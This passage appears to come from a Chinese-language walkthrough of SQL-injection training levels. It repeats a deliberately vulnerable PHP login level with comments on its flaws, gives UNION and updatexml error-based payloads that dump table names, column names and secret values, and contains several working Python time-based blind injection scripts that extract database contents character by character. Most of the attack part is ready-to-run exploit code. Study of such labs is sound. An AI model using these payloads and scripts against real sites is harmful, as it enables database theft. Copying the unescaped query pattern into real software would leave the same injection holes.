        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Error text is not reflected (print_r is commented out).
        echo '<font color= "#FFFF00">';
//               print_r(mysql_error());
        echo "</font>";
    }
}



payload：20"union select 1,group_concat(table_name),group_concat(column_name) from information_schema.columns where table_schema=database()--+


查询key：20"union select 1, secret_6E9J,3 from pfn2gwm7ps--+



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >= ($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is placed inside single quotes with no escaping.
    // Fix: a prepared statement (mysqli/PDO — ext/mysql cannot bind) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // The displayed name and password are looked up in a hard-coded
        // 13-entry array by $row['id'] (indices 0-12; other ids raise an
        // undefined-offset notice). Column values from the row itself are never
        // echoed, so a UNION cannot surface data on this level.
        echo '<font color= "#00FFFF">';
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        // The raw database error is reflected here, which is the channel the
        // error-based payloads on this page rely on. Fix: log the error
        // server-side and show a generic message.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}

执行 SQL 语句后,页面显示的用户名/密码来自硬编码的 $unames 数组(按 $row['id'] 索引),并没有回显数据库当中的数据,所以我们这里不能使用 union 联合注入;而 mysql_error() 会被直接输出到页面,因此这里使用报错注入。

爆表：2'and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+


爆列：2'and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1)--+


查询key：2'and updatexml(1,concat(0x7e,(select(group_concat(secret_U5X2))from(3ix3008tpb)),0x7e),1)--+



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >= ($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is interpolated with no quoting at all, so any
    // expression in the input is evaluated as SQL. Fix: a prepared statement
    // (mysqli/PDO — ext/mysql cannot bind) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Name and password come from a hard-coded 13-entry array indexed by
        // $row['id'] (indices 0-12); row column values are never echoed, so a
        // UNION cannot surface data on this level.
        echo '<font color= "#00FFFF">';
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        // The raw database error is reflected (error-based channel). Fix: log
        // it server-side and show a generic message.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}


爆表：2 and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+


爆列：2 and updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1)--+


查询key：2 and updatexml(1,concat(0x7e,(select(group_concat(secret_E9IK))from(a226u6ahlu)),0x7e),1)--+



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >= ($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Wrapping the value in ("...") is not escaping: a '"' in the input still
    // terminates the literal and the parenthesis is then trivially closed.
    $id = '("'.$id.'")';
    // Querry DB to get the correct output
    // Vulnerable line: the wrapped-but-unescaped $id is interpolated directly.
    // Fix: a prepared statement (mysqli/PDO — ext/mysql cannot bind) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Name and password come from a hard-coded 13-entry array indexed by
        // $row['id'] (indices 0-12); row column values are never echoed.
        echo '<font color= "#00FFFF">';
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        // The raw database error is reflected (error-based channel). Fix: log
        // it server-side and show a generic message.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}

这一关把 $id 用双引号和括号包裹了起来:$id = '("'.$id.'")';,与上一关类似,构造对应的闭合即可绕过。

payload：2")and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >= ($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is wrapped in (('...')); a quote in the input ends
    // the literal and the two parentheses are then closed. Extra wrapping is
    // not escaping — use a prepared statement (mysqli/PDO) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Name and password come from a hard-coded 13-entry array indexed by
        // $row['id'] (indices 0-12); row column values are never echoed.
        echo '<font color= "#00FFFF">';
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        // The raw database error is reflected (error-based channel). Fix: log
        // it server-side and show a generic message.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}


1'))and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt; for a blind
    // level this log is the clearest server-side trace of the probing.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >= ($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is wrapped in ('...') without escaping. Fix: a
    // prepared statement (mysqli/PDO — ext/mysql cannot bind) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Name and password come from a hard-coded 13-entry array indexed by
        // $row['id'] (indices 0-12); row column values are never echoed.
        echo '<font color= "#00FFFF">';
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        // No error text is reflected (print_r is commented out) and no row data
        // is echoed, so neither error-based nor UNION output exists here; only
        // response time differs, which is why the script following this block
        // uses a timing oracle.
        echo '<font color= "#FFFF00">';
//               print_r(mysql_error());
        echo "</font>";
    }
}


# Time-based blind PoC for the id=('$id') level shown above: the probe closes
# the quote and parenthesis and appends if(<cond>, sleep(5), -1), so a slow
# response means the condition held.
import requests
import time
url = ""
flag = ''


def payload(i: int, j: int) -> int:
    """Return 1 if character i of the probed value has an ASCII code > j, else 0.

    The oracle is wall-clock time only: a response slower than 5 s counts as
    true. A request exception (including the 10 s timeout) is swallowed and,
    because only the elapsed time is checked, also counts as true; r is never
    used.
    """
    startTime=time.time()
    # database name
    sql = "1')and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)-- "%(i,j)
    # table names
    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # column names
    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # query the flag
    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    try:
        # url is expected to contain a single %s placeholder for the probe.
        r = requests.get(url % sql, timeout=10)
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt.
        pass
    # print (r.url)
    if time.time()-startTime>5:
        res = 1
    else:
        res = 0
    return res


def exp() -> None:
    """Recover the probed string one character at a time, printing progress.

    Each position costs about seven payload() calls (bisection of 31..127),
    every true branch of which holds a server connection for 5 s. The loop
    stops when the resolved code is 31 or 127, i.e. no character matched.
    Note for defenders: the level logs every id value to result.txt, so the
    complete probe sequence is recorded server-side.
    """
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        # After the loop low == high + 1, so f is simply low.
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


# Runs on import.
exp()



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt; for a blind
    // level this log is the clearest server-side trace of the probing.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >= ($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is placed inside single quotes with no escaping.
    // Fix: a prepared statement (mysqli/PDO — ext/mysql cannot bind) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Name and password come from a hard-coded 13-entry array indexed by
        // $row['id'] (indices 0-12); row column values are never echoed.
        echo '<font color= "#00FFFF">';
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        // No error text is reflected (print_r is commented out) and no row data
        // is echoed; only response time differs, hence the timing oracle in the
        // script that follows this block.
        echo '<font color= "#FFFF00">';
//               print_r(mysql_error());
        echo "</font>";
    }
}


# Time-based blind PoC for the id='$id' level shown above: the probe closes the
# quote and appends if(<cond>, sleep(5), -1), so a slow response means the
# condition held.
import requests
import time
url = ""
flag = ''


def payload(i: int, j: int) -> int:
    """Return 1 if character i of the probed value has an ASCII code > j, else 0.

    The oracle is wall-clock time only: a response slower than 5 s counts as
    true. A request exception (including the 10 s timeout) is swallowed and,
    because only the elapsed time is checked, also counts as true; r is never
    used.
    """
    startTime=time.time()
    # database name
    sql = "1'and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)-- "%(i,j)
    # table names
    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # column names
    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # query the flag
    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    try:
        # url is expected to contain a single %s placeholder for the probe.
        r = requests.get(url % sql, timeout=10)
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt.
        pass
    # print (r.url)
    if time.time()-startTime>5:
        res = 1
    else:
        res = 0
    return res


def exp() -> None:
    """Recover the probed string one character at a time, printing progress.

    Each position costs about seven payload() calls (bisection of 31..127),
    every true branch of which holds a server connection for 5 s. The loop
    stops when the resolved code is 31 or 127, i.e. no character matched.
    Note for defenders: the level logs every id value to result.txt, so the
    complete probe sequence is recorded server-side.
    """
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        # After the loop low == high + 1, so f is simply low.
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


# Runs on import.
exp()



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt; for a blind
    // level this log is the clearest server-side trace of the probing.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >= ($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is interpolated inside (( )) with no quoting, so any
    // expression in the input is evaluated as SQL. Fix: a prepared statement
    // (mysqli/PDO — ext/mysql cannot bind) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Name and password come from a hard-coded 13-entry array indexed by
        // $row['id'] (indices 0-12); row column values are never echoed.
        echo '<font color= "#00FFFF">';
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        // No error text is reflected (print_r is commented out) and no row data
        // is echoed; only response time differs, hence the timing oracle in the
        // script that follows this block.
        echo '<font color= "#FFFF00">';
//               print_r(mysql_error());
        echo "</font>";
    }
}


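import time

# Target URL template.  It must contain exactly one "%s", which receives the
# injected id value, e.g. "http://host/Less-N/?id=%s".  Left empty on purpose.
url = ""
# Characters recovered so far.
flag = ''

# Fragment that closes the vulnerable expression.  The server builds
#   SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1
# so "1))" closes both parentheses; the trailing "-- " comments out the rest.
PREFIX = "1))"

# Seconds SLEEP() is asked to wait on a TRUE probe, and the client-side request
# timeout.  TIMEOUT is kept above DELAY so that a timed-out request can safely
# be read as TRUE instead of being confused with a transport error.
DELAY = 5
TIMEOUT = 10


def payload(i, j):
    """Time-based oracle: is ASCII(character *i* of the target string) > *j*?

    Sends one request and returns 1 when the response took longer than DELAY
    seconds (the SLEEP() branch ran) or when the request hit the client
    timeout, else 0.  Transport errors other than a timeout are re-raised:
    a dead target must not silently decode as FALSE and yield a garbage string.
    """
    import requests  # third-party; imported here so search_char stays importable without it

    start = time.time()
    # Active target: the current database name.  The alternatives below keep
    # the same shape for table names, column names and the password column.
    sql = "%sand if(ascii(substr(database(),%d,1))>%d,sleep(%d),-1)-- " % (PREFIX, i, j, DELAY)
    # sql = "%sand if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(%d),-1)-- " % (PREFIX, i, j, DELAY)
    # sql = "%sand if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(%d),-1)-- " % (PREFIX, i, j, DELAY)
    # sql = "%sand if(ascii(substr((select group_concat(password) from users),%d,1))>%d,sleep(%d),-1)-- " % (PREFIX, i, j, DELAY)
    try:
        requests.get(url % sql, timeout=TIMEOUT)
    except requests.Timeout:
        # The server slept well past DELAY: that is a TRUE answer.
        return 1
    return 1 if time.time() - start > DELAY else 0


def search_char(oracle, i, low=31, high=127):
    """Binary-search the ASCII code of character *i* using a ">" oracle.

    *oracle(i, j)* must be truthy exactly when the code is greater than *j*.
    Returns the resolved code.  If every probe is false (for example past the
    end of the string, where substr() yields '' and ascii('') is 0) the result
    is *low*; if every probe is true it is *high* + 1.
    """
    lo, hi = low, high
    while lo <= hi:
        mid = (lo + hi) // 2
        if oracle(i, mid):
            lo = mid + 1
        else:
            hi = mid - 1
    # On exit lo == hi + 1, and lo is the smallest value the code is not greater than.
    return lo


def exp():
    """Recover the target string one character at a time into the global *flag*.

    Stops at the first position whose resolved code is a control character
    (<= 31, which is what an exhausted substr() decodes to) or >= 127, which
    no printable ASCII character produces.  Prints the partial result after
    every character so progress survives an interrupted run.
    """
    global flag
    if "%s" not in url:
        raise SystemExit("set `url` to the target URL template containing %s for the id parameter")
    for i in range(1, 10000):
        f = search_char(payload, i)
        if f <= 31 or f >= 127:
            break
        flag += chr(f)
        print(flag)


if __name__ == "__main__":
    exp()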



if(isset($_GET['id']))
{
    // Untrusted input: taken verbatim from the query string, never validated or escaped.
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    // NOTE(review): $id is written raw, so a value containing "\n" can forge
    // additional "ID:" entries in result.txt (log injection).
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    //update the counter in database
    next_tryy();

    //Display attempts on screen.
    // $times and $pag are not defined in this block; presumably set by the including page.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";

    //Reset the Database if you exceed allowed attempts.
    if($tryyy >= ($times+1))
    {
        // Expire the challenge cookie by dating it far in the past.
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        // NOTE(review): output has already been echoed above, so this header()
        // and the setcookie() are expected to fail with "headers already sent"
        // unless output buffering is enabled.  Execution also falls through to
        // the query below instead of stopping here.
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }

    // Wrapping the value in double quotes is NOT escaping: a '"' inside $id
    // closes the literal, and a following ')' closes the parenthesis below.
    $id = '"'.$id.'"';
    // Querry DB to get the correct output
    // SQL INJECTION SINK: the statement becomes  ... WHERE id=("<input>") ...,
    // so an input starting with '1")' breaks out and can append arbitrary SQL;
    // a trailing "-- " then comments out " LIMIT 0,1".  The mysql_* extension
    // is also deprecated (removed in PHP 7); in real code this would be a
    // prepared statement with a bound integer parameter.
    $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo '<font color= "#00FFFF">';
        // The real username/password columns are never echoed: the displayed
        // values are looked up from these fixed arrays by $row['id'].  Only the
        // id column of a returned row influences the page, so a UNION cannot
        // dump other columns here and the injection has to be exploited blind
        // (the accompanying script uses a time-based oracle).
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        // Database errors are deliberately not shown (print_r left commented
        // out), so there is no error-based channel either.
        echo '<font color= "#FFFF00">';
//      print_r(mysql_error());
        echo "</font>";
    }
}


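import time

# Target URL template.  It must contain exactly one "%s", which receives the
# injected id value, e.g. "http://host/Less-N/?id=%s".  Left empty on purpose.
url = ""
# Characters recovered so far.
flag = ''

# Fragment that closes the vulnerable expression.  The server wraps the input
# in double quotes and builds
#   SELECT * FROM security.users WHERE id=("$id") LIMIT 0,1
# so '1")' closes the literal and the parenthesis; "-- " comments out the rest.
PREFIX = '1")'

# Seconds SLEEP() is asked to wait on a TRUE probe, and the client-side request
# timeout.  TIMEOUT is kept above DELAY so that a timed-out request can safely
# be read as TRUE instead of being confused with a transport error.
DELAY = 5
TIMEOUT = 10


def payload(i, j):
    """Time-based oracle: is ASCII(character *i* of the target string) > *j*?

    Sends one request and returns 1 when the response took longer than DELAY
    seconds (the SLEEP() branch ran) or when the request hit the client
    timeout, else 0.  Transport errors other than a timeout are re-raised:
    a dead target must not silently decode as FALSE and yield a garbage string.
    """
    import requests  # third-party; imported here so search_char stays importable without it

    start = time.time()
    # Active target: the current database name.  The alternatives below keep
    # the same shape for table names, column names and the password column.
    sql = "%sand if(ascii(substr(database(),%d,1))>%d,sleep(%d),-1)-- " % (PREFIX, i, j, DELAY)
    # sql = "%sand if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(%d),-1)-- " % (PREFIX, i, j, DELAY)
    # sql = "%sand if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(%d),-1)-- " % (PREFIX, i, j, DELAY)
    # sql = "%sand if(ascii(substr((select group_concat(password) from users),%d,1))>%d,sleep(%d),-1)-- " % (PREFIX, i, j, DELAY)
    try:
        requests.get(url % sql, timeout=TIMEOUT)
    except requests.Timeout:
        # The server slept well past DELAY: that is a TRUE answer.
        return 1
    return 1 if time.time() - start > DELAY else 0


def search_char(oracle, i, low=31, high=127):
    """Binary-search the ASCII code of character *i* using a ">" oracle.

    *oracle(i, j)* must be truthy exactly when the code is greater than *j*.
    Returns the resolved code.  If every probe is false (for example past the
    end of the string, where substr() yields '' and ascii('') is 0) the result
    is *low*; if every probe is true it is *high* + 1.
    """
    lo, hi = low, high
    while lo <= hi:
        mid = (lo + hi) // 2
        if oracle(i, mid):
            lo = mid + 1
        else:
            hi = mid - 1
    # On exit lo == hi + 1, and lo is the smallest value the code is not greater than.
    return lo


def exp():
    """Recover the target string one character at a time into the global *flag*.

    Stops at the first position whose resolved code is a control character
    (<= 31, which is what an exhausted substr() decodes to) or >= 127, which
    no printable ASCII character produces.  Prints the partial result after
    every character so progress survives an interrupted run.
    """
    global flag
    if "%s" not in url:
        raise SystemExit("set `url` to the target URL template containing %s for the id parameter")
    for i in range(1, 10000):
        f = search_char(payload, i)
        if f <= 31 or f >= 127:
            break
        flag += chr(f)
        print(flag)


if __name__ == "__main__":
    exp()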


